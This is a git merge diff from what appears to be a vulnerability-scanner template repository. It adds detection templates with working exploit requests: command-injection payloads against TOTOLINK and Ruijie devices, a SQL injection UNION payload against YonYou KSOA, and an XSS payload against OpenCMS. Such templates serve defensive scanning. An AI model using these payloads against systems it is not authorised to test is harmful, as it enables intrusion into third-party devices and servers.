Merge branch 'main' into main

2023-12-29 09:18:21 +05:30 · 2023-12-29 09:18:21 +05:30 · 163e9a35c1
parent 5494a59f98 b89ff611fe
commit 163e9a35c1
15 changed files with 382 additions and 128 deletions
--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@ -3,58 +3,6 @@ on:
  push:
    paths:
    - '.new-additions'
-    - 'http/cves/2023/CVE-2023-41266.yaml'
-    - 'http/cves/2023/CVE-2023-43177.yaml'
-    - 'http/cves/2023/CVE-2023-49070.yaml'
-    - 'http/cves/2023/CVE-2023-5556.yaml'
-    - 'http/cves/2023/CVE-2023-6018.yaml'
-    - 'http/cves/2023/CVE-2023-6020.yaml'
-    - 'http/cves/2023/CVE-2023-6021.yaml'
-    - 'http/cves/2023/CVE-2023-6380.yaml'
-    - 'http/default-logins/dataease/dataease-default-login.yaml'
-    - 'http/default-logins/splunk/splunk-default-login.yaml'
-    - 'http/exposed-panels/dataease-panel.yaml'
-    - 'http/exposed-panels/reportico-admin-panel.yaml'
-    - 'http/exposed-panels/tailon-panel.yaml'
-    - 'http/exposed-panels/woodwing-panel.yaml'
-    - 'http/exposures/configs/dompdf-config.yaml'
-    - 'http/misconfiguration/installer/businesso-installer.yaml'
-    - 'http/misconfiguration/installer/chamilo-installer.yaml'
-    - 'http/misconfiguration/installer/knowledgetree-installer.yaml'
-    - 'http/misconfiguration/installer/phpgedview-installer.yaml'
-    - 'http/misconfiguration/installer/wowcms-installer.yaml'
-    - 'http/misconfiguration/secnet-info-leak.yaml'
-    - 'http/misconfiguration/woodwing-git.yaml'
-    - 'http/misconfiguration/woodwing-phpinfo.yaml'
-    - 'http/technologies/element-web-detect.yaml'
-    - 'http/technologies/matrix-homeserver-detect.yaml'
-    - 'http/vulnerabilities/dahua/dahua-wpms-lfi.yaml'
-    - 'http/vulnerabilities/dahua/dahua-wpms-rce.yaml'
-    - 'http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml'
-    - 'http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml'
-    - 'http/vulnerabilities/other/yibao-sqli.yaml'
-    - 'http/vulnerabilities/other/yunanbao-rce.yaml'
-    - 'javascript/cves/2023/CVE-2023-46604.yaml'
-    - 'headless/cves/2018/CVE-2018-25031.yaml'
-    - 'http/cves/2021/CVE-2021-44910.yaml'
-    - 'http/cves/2023/CVE-2023-22232.yaml'
-    - 'http/cves/2023/CVE-2023-30534.yaml'
-    - 'http/cves/2023/CVE-2023-3368.yaml'
-    - 'http/cves/2023/CVE-2023-36144.yaml'
-    - 'http/cves/2023/CVE-2023-39002.yaml'
-    - 'http/cves/2023/CVE-2023-41265.yaml'
-    - 'code/cves/2023/CVE-2023-49105.yaml'
-    - 'http/cves/2021/CVE-2021-29200.yaml'
-    - 'http/cves/2023/CVE-2023-6553.yaml'
-    - 'http/exposed-panels/vue-pacs-panel.yaml'
-    - 'http/misconfiguration/installer/espocrm-installer.yaml'
-    - 'http/misconfiguration/mixed-active-content.yaml'
-    - 'http/misconfiguration/mixed-passive-content.yaml'
-    - 'http/technologies/bamboo-detect.yaml'
-    - 'http/technologies/iparapheur-detect.yaml'
-    - 'http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml'
-    - 'http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml'
-    - 'http/vulnerabilities/other/sslvpn-client-rce.yaml'
  workflow_dispatch:
 jobs:
  triggerRemoteWorkflow:
--- a/.new-additions
+++ b/.new-additions
@ -1,61 +1,8 @@
-code/cves/2023/CVE-2023-49105.yaml
-headless/cves/2018/CVE-2018-25031.yaml
-http/cves/2018/CVE-2018-8823.yaml
-http/cves/2021/CVE-2021-29200.yaml
-http/cves/2021/CVE-2021-44910.yaml
-http/cves/2022/CVE-2022-0087.yaml
-http/cves/2023/CVE-2023-22232.yaml
-http/cves/2023/CVE-2023-26035.yaml
-http/cves/2023/CVE-2023-30534.yaml
-http/cves/2023/CVE-2023-3368.yaml
-http/cves/2023/CVE-2023-36144.yaml
-http/cves/2023/CVE-2023-39002.yaml
-http/cves/2023/CVE-2023-41265.yaml
-http/cves/2023/CVE-2023-41266.yaml
-http/cves/2023/CVE-2023-43177.yaml
-http/cves/2023/CVE-2023-46359.yaml
-http/cves/2023/CVE-2023-49070.yaml
-http/cves/2023/CVE-2023-5556.yaml
-http/cves/2023/CVE-2023-6018.yaml
-http/cves/2023/CVE-2023-6020.yaml
-http/cves/2023/CVE-2023-6021.yaml
-http/cves/2023/CVE-2023-6038.yaml
-http/cves/2023/CVE-2023-6380.yaml
-http/cves/2023/CVE-2023-6553.yaml
-http/default-logins/dataease/dataease-default-login.yaml
-http/default-logins/splunk/splunk-default-login.yaml
-http/exposed-panels/dataease-panel.yaml
-http/exposed-panels/reportico-admin-panel.yaml
-http/exposed-panels/tailon-panel.yaml
-http/exposed-panels/vue-pacs-panel.yaml
-http/exposed-panels/woodwing-panel.yaml
-http/exposures/configs/dompdf-config.yaml
-http/misconfiguration/aws/cdn-cache-poisoning.yaml
-http/misconfiguration/h2o/h2o-arbitary-file-read.yaml
-http/misconfiguration/h2o/h2o-dashboard.yaml
-http/misconfiguration/installer/businesso-installer.yaml
-http/misconfiguration/installer/chamilo-installer.yaml
-http/misconfiguration/installer/espocrm-installer.yaml
-http/misconfiguration/installer/knowledgetree-installer.yaml
-http/misconfiguration/installer/phpgedview-installer.yaml
-http/misconfiguration/installer/wowcms-installer.yaml
-http/misconfiguration/mixed-active-content.yaml
-http/misconfiguration/mixed-passive-content.yaml
-http/misconfiguration/secnet-info-leak.yaml
-http/misconfiguration/woodwing-git.yaml
-http/misconfiguration/woodwing-phpinfo.yaml
-http/technologies/bamboo-detect.yaml
-http/technologies/element-web-detect.yaml
-http/technologies/iparapheur-detect.yaml
-http/technologies/matrix-homeserver-detect.yaml
-http/vulnerabilities/dahua/dahua-wpms-lfi.yaml
-http/vulnerabilities/dahua/dahua-wpms-rce.yaml
-http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml
-http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
-http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml
-http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml
-http/vulnerabilities/other/sslvpn-client-rce.yaml
-http/vulnerabilities/other/yibao-sqli.yaml
-http/vulnerabilities/other/yunanbao-rce.yaml
-http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml
-javascript/cves/2023/CVE-2023-46604.yaml
+http/cves/2015/CVE-2015-2794.yaml
+http/cves/2023/CVE-2023-42343.yaml
+http/cves/2023/CVE-2023-46574.yaml
+http/exposures/docker-daemon-exposed.yaml
+http/token-spray/api-openai.yaml
+http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
+http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
+http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
--- a/cves.json
+++ b/cves.json
@ -271,6 +271,7 @@
 {"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"}
 {"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"}
 {"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"}
+{"ID":"CVE-2015-2794","Info":{"Name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","Severity":"critical","Description":"The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2794.yaml"}
 {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"}
 {"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"}
 {"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"}
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@ -1 +1 @@
-94707e96d497767157be7c0c5b06fac3
+8ba13563d80d4c1e36d4b6dff2c7f027
--- a/dns/dns-saas-service-detection.yaml
+++ b/dns/dns-saas-service-detection.yaml
@ -55,6 +55,7 @@ dns:
          - "servicebus.windows.net"
          - "visualstudio.com"
          - "-msedge.net"
+          - "msappproxy.net"
          - "trafficmanager.net"

      - type: word
@ -433,5 +434,4 @@ dns:
        regex:
          - "IN\tCNAME\\t(.+)$"
          - "IN\\s*CNAME\\t(.+)$"
-
-# digest: 4a0a004730450221008eca40fb73f32c811d6d1d7283bbf220eb09a81bbaa047e4204406dd1c4da012022033a3e578c9ee7d903cff9bc617af38353d49ba0cb65955487aca3e841cdbfc56:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205694ac1cba58232ec715831e94086da7081a9b756f86016358b1347a1a340787022040615d63a66787d706d2be8b3f13cead87f7278c471091a7783bfab4e4fa2aef:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2015/CVE-2015-2794.yaml
+++ b/http/cves/2015/CVE-2015-2794.yaml
@ -0,0 +1,45 @@
+id: CVE-2015-2794
+
+info:
+  name: DotNetNuke 07.04.00 - Administration Authentication Bypass
+  author: 1337kro
+  severity: critical
+  description: |
+    The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-2794
+    - https://www.exploit-db.com/exploits/39777
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2015-2794
+    cwe-id: CWE-264
+    epss-score: 0.9711
+    epss-percentile: 0.99736
+    cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: dotnetnuke
+    product: dotnetnuke
+    verified: true
+    fofo-query: app="DotNetNuke"
+  tags: cve,cve2015,dotnetnuke,auth-bypass,install
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Administrative Information"
+          - "Database Information"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+# digest: 490a0046304402201158c001259e4db42e4a00041d56cb95363728da7170e407c3c0d99701f0f426022078549a7f4b8f1aca49f2e0c6dd0849c52df6812d9e901daa10b925a59aea47c3:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2023/CVE-2023-42343.yaml
+++ b/http/cves/2023/CVE-2023-42343.yaml
@ -0,0 +1,35 @@
+id: CVE-2023-42343
+
+info:
+  name: OpenCMS - Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
+  remediation: Fixed in 10.5.1.
+  reference:
+    - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
+  classification:
+    cve-id: CVE-2023-42343
+  metadata:
+    max-request: 1
+    shodan-query: "/opencms/"
+    verified: true
+  tags: cve,cve2023,xss,opencms
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27"><svg%20onload=alert(document.domain)>'
+    headers:
+      Content-Type: application/cmisquery+xml
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Apache Chemistry OpenCMIS'
+          - '<svg onload=alert(document.domain)>'
+        condition: and
+# digest: 4a0a00473045022059541a77f42a99970a9f0b5cc68fd577751fffab1e2c2350f636f6e445739f35022100afe449fd219a2ed7b76c45634f3eef7856e4b86c12459e9e002bb08364a2d9cc:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2023/CVE-2023-46574.yaml
+++ b/http/cves/2023/CVE-2023-46574.yaml
@ -0,0 +1,59 @@
+id: CVE-2023-46574
+
+info:
+  name: TOTOLINK A3700R - Command Injection
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-46574
+    - https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-46574
+    cwe-id: CWE-77
+    epss-score: 0.00223
+    epss-percentile: 0.60602
+    cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"Totolink"
+    vendor: totolink
+    product: a3700r_firmware
+  tags: cve,cve2023,totolink,router,iot,rce
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "<title>TOTOLINK</title>")'
+        condition: and
+
+  - raw:
+      - |
+        GET /cgi-bin/cstecgi.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        {"topicurl":"UploadFirmwareFile","FileName":";id"}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100f3b495dfdf9013fd352455e557179b61f26ea1a8b0681f19e7c5765f069fd411022100f74770687188358ff96bcf2b881c7ae1428a59ac92db8ee9398813263bef7b7b:922c64590222798bb761d5b6d8e72950
--- a/http/exposures/backups/zip-backup-files.yaml
+++ b/http/exposures/backups/zip-backup-files.yaml
@ -47,6 +47,7 @@ http:
        - "Release"
        - "inetpub"
      EXT:
+        - "tar"
        - "7z"
        - "bz2"
        - "gz"
@ -78,6 +79,8 @@ http:
    matchers:
      - type: binary
        binary:
+          - "7573746172202000" #tar
+          - "7573746172003030"  #tar
          - "377ABCAF271C" # 7z
          - "314159265359" # bz2
          - "53514c69746520666f726d6174203300" # SQLite format 3.
@ -100,5 +103,4 @@ http:
      - type: status
        status:
          - 200
-
-# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f1b960a5ba045bf36ea054d29625ba8d82bdc3c2ff9142dd3404c7c985830e00022100ba48d514f25d68bd0a5d8e673ef37791052fc026a12860ac837c73a519dd7e07:922c64590222798bb761d5b6d8e72950
--- a/http/exposures/docker-daemon-exposed.yaml
+++ b/http/exposures/docker-daemon-exposed.yaml
@ -0,0 +1,41 @@
+id: docker-daemon-exposed
+
+info:
+  name: Docker Daemon Exposed
+  author: Arm!tage
+  severity: critical
+  description: |
+    Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.
+  metadata:
+    max-request: 1
+    shodan-query: port:2375 product:"docker"
+    fofa-query: app="docker-Daemon" && port="2375"
+    verified: true
+  tags: docker,exposure,misconfig
+
+http:
+  - raw:
+      - |
+        GET /version HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /v{{version}}/containers/json HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_1, "ApiVersion") && contains(body_1, "GitCommit") && contains(body_1, "GoVersion")  && contains(body_1, "KernelVersion")'
+          - 'contains(body_2, "Id") && contains(body_2, "Names") && contains(body_2, "Image") && contains(body_2, "Command") && contains(body_2, "PrivatePort") && contains(body_2, "PublicPort") || contains(body_2, "[]")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - '"ApiVersion":"(.*?)"'
+        internal: true
+# digest: 490a00463044022078569870dba91a13ef48bf89cc7acf390bd48f5466e1721acfa1337f23fd752802207843a2e01e46cb87cdc2cfa9f8ea3a3d5a0fa0ed378bee864de3e52ca24a4339:922c64590222798bb761d5b6d8e72950
--- a/http/token-spray/api-openai.yaml
+++ b/http/token-spray/api-openai.yaml
@ -0,0 +1,47 @@
+id: api-openai
+
+info:
+  name: OpenAI API Test
+  author: geeknik
+  severity: info
+  reference:
+    - https://platform.openai.com/docs/api-reference
+  metadata:
+    max-request: 1
+    verified: true
+  tags: token-spray,openai
+
+self-contained: true
+
+http:
+  - method: POST
+    path:
+      - "https://api.openai.com/v1/chat/completions"
+    body: |
+      {
+        "model": "gpt-3.5-turbo",
+        "messages": [
+          {"role": "system", "content": "You are a helpful assistant designed to output JSON."},
+          {"role": "user", "content": "Who won the world series in 2020?"}
+        ]
+      }
+
+    headers:
+      Content-Type: application/json
+      Authorization: Bearer {{token}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Los Angeles Dodgers'
+      - type: word
+        part: body
+        words:
+          - 'invalid_request_error'
+          - 'Incorrect API key'
+          - 'invalid_api_key'
+        condition: or
+        negative: true
+# digest: 4a0a004730450220422646717a6541b29d8c7b75c9b7e1fd29aacfdb32eadd984cd42d10bce9bb8f022100834fe5f01797940eff4f945f61a4e9522a53cfd16f9d6aed5b323fcc0e357051:922c64590222798bb761d5b6d8e72950
--- a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
@ -0,0 +1,41 @@
+id: ruijie-nmc-sync-rce
+
+info:
+  name: Ruijie RG-UAC nmc_sync.php - Remote Code Execution
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    There is a command execution vulnerability in the nmc_sync.php interface of Ruijie's RG-UAC unified online behavior management and audit system. An unauthenticated attacker can execute arbitrary commands to control server permissions.
+  reference:
+    - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
+  metadata:
+    max-request: 3
+    verified: true
+    fofa-query: title="RG-UAC登录页面" && body="admin"
+  tags: rg-uac,file-upload,intrusive,ruijie
+
+variables:
+  random_str: "{{rand_base(6)}}"
+  match_str: "{{md5(random_str)}}"
+
+http:
+  - raw:
+      - |
+        GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo+{{match_str}}+>+{{random_str}}.txt|cat HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /view/systemConfig/management/{{random_str}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|rm+{{random_str}}.txt|cat HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && status_code_2 == 200"
+          - "contains(body_2, '{{match_str}}')"
+        condition: and
+# digest: 490a004630440220107e82c256ac53f33688042cb40b0ab8357fe4c6a177cda03aa8d28bb425cab402206cc9b6dee983d7b147da5987a1cc826b661b926f421509e9dbdaccae2861a971:922c64590222798bb761d5b6d8e72950
--- a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
@ -0,0 +1,41 @@
+id: ruijie-rg-eg-web-mis-rce
+
+info:
+  name: Ruijie RG-EG - Remote Code Execution
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    Ruijie RG-EG easy gateway WEB management system front-end RCE has a command execution vulnerability. An attacker without identity authentication can execute arbitrary commands to control server permissions.
+  reference:
+    - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_WEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: body="请输入您的RG-EG易网关的用户名和密码"
+  tags: ruijie,router,iot,rce
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "ruijie")'
+        condition: and
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/update.php?jungle=id"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
+        condition: and
+# digest: 4a0a004730450220298e4a509f8a4ada203541928158a36e026d8558df1144d2456f0fcac669d723022100b0a5525c3c77ed802dbb654d57bf01b32bf01a811ee1acc813e65a87559786f1:922c64590222798bb761d5b6d8e72950
--- a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
@ -0,0 +1,39 @@
+id: yonyou-ksoa-dept-sqli
+
+info:
+  name: YonYou KSOA common/dept.jsp - SQL injection
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Yonyou KSOA contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  reference:
+    - https://mp.weixin.qq.com/s/I6aG2vFIi5nbVZfuVNpyDw
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="用友-时空KSOA"
+  tags: yonyou,oa,sqli,ksoa
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/common/dept.jsp?deptid=1'+UNION+ALL+SELECT+60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'{{num}}'))--+"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '0x{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100922859f664e4119692c97837afcf0e55f50952e31ba4d106bfced7a702cde4c3022100db43d0d8ca69943f8ecf515a9ee9e142599c9d652ffef759f0238a20f7056e2b:922c64590222798bb761d5b6d8e72950
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@ -2,23 +2,23 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593
 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71
 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df
 PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7
-README.md:b4463d7ed41c0ac8f42d06c3952767923c03478e
+README.md:f00189942f4fa9e414b1089ada7711614b11e85b
 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26
-TEMPLATES-STATS.json:00d0be55644f406ad1bdb19f957df95152440ebe
-TEMPLATES-STATS.md:83081b616907b600caa4b294556793eb55f81bf9
-TOP-10.md:9d874df00b5b3824ffaa42314a0e0549a3292446
+TEMPLATES-STATS.json:7ccb771c271fe2c18e8d9b86ffc044c3c3affd4a
+TEMPLATES-STATS.md:1c9813a0af8a44e624302050722dfec4d140810c
+TOP-10.md:2cd79b73aec87dde6c2ca8ef5f0df433fab3d107
 code/cves/2023/CVE-2023-2640.yaml:50153a9f47faa62533d609faec8d12113d620354
 code/cves/2023/CVE-2023-49105.yaml:3512873783f700bf5fb98b342dd84653085a0a79
 code/cves/2023/CVE-2023-4911.yaml:b0087888697dcdbdf06ec95866cf08fcd6a2a76a
 config/recommended.yml:56cce704c23915f282aa2bca69952626aeea5e13
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:393e94bc85a915c5e2efa4557b00fb6ccdfdec93
-cves.json-checksum.txt:f21e511ade96e01e7bb7f9d96e08e556c718e48c
+cves.json:06f1b457f42fb28649ba5342a462c84c3f8c2fda
+cves.json-checksum.txt:fc7c554376e31384ec60488e43ac7b322c0b616a
 dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37
-dns/dns-saas-service-detection.yaml:d72feb3c8e7147f9bc37020843647992016b7659
+dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e
 dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c
 dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592
 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644
@ -936,6 +936,7 @@ http/cves/2015/CVE-2015-2080.yaml:180c0d9b39eebb25504e19d83aaab1b4cf8bfa97
 http/cves/2015/CVE-2015-2166.yaml:9435d5238cddf255b9814a424181cb529938bcad
 http/cves/2015/CVE-2015-2196.yaml:dbd9f617f9f46da1f41b7e7b37516bd03bef7b8d
 http/cves/2015/CVE-2015-2755.yaml:2a87aa2692d6aed72de82010b13300b8cb1b9f8f
+http/cves/2015/CVE-2015-2794.yaml:ba064904aecb2a2d6c43afa9c4b014fe48531535
 http/cves/2015/CVE-2015-2807.yaml:770045f6ee23a0ec2ee49617c6925bf7f2259681
 http/cves/2015/CVE-2015-2863.yaml:4479beacef9707ef297d61a4a357119d030687df
 http/cves/2015/CVE-2015-2996.yaml:b03d095677bb8644c23b9f2cea10c194d714f879
@ -2867,6 +2868,7 @@ http/cves/2023/CVE-2023-4173.yaml:dd8fc306806e02e32b2b65c1724af7d2e98a0750
 http/cves/2023/CVE-2023-4174.yaml:198a66f32f2380336f28a80f9d01a011be85d734
 http/cves/2023/CVE-2023-41763.yaml:5309f08e84061f05237d084a16c52c437e6c0a77
 http/cves/2023/CVE-2023-41892.yaml:c3c96a50f998019eb2f4758715690854c33eb55a
+http/cves/2023/CVE-2023-42343.yaml:fb446106f82992be050cf1eac67f524e579950a6
 http/cves/2023/CVE-2023-42442.yaml:9a20ac3bf72a03abc2e2e5bd5e5b71a78d9cac6c
 http/cves/2023/CVE-2023-42793.yaml:996b31479d926952afef3be9af399801d7034027
 http/cves/2023/CVE-2023-43177.yaml:56bd157549c16eb05221a59aab962165b4bf992c
@ -2882,7 +2884,8 @@ http/cves/2023/CVE-2023-4568.yaml:0bd963794f42d4383e64913b7b879782ceec2054
 http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2
 http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10
 http/cves/2023/CVE-2023-4634.yaml:daab5c713c8bd42dfa868fa9532bdd100717a39a
-http/cves/2023/CVE-2023-46359.yaml:b1170e0eabce6a6a06ae81ec0ece5133da436597
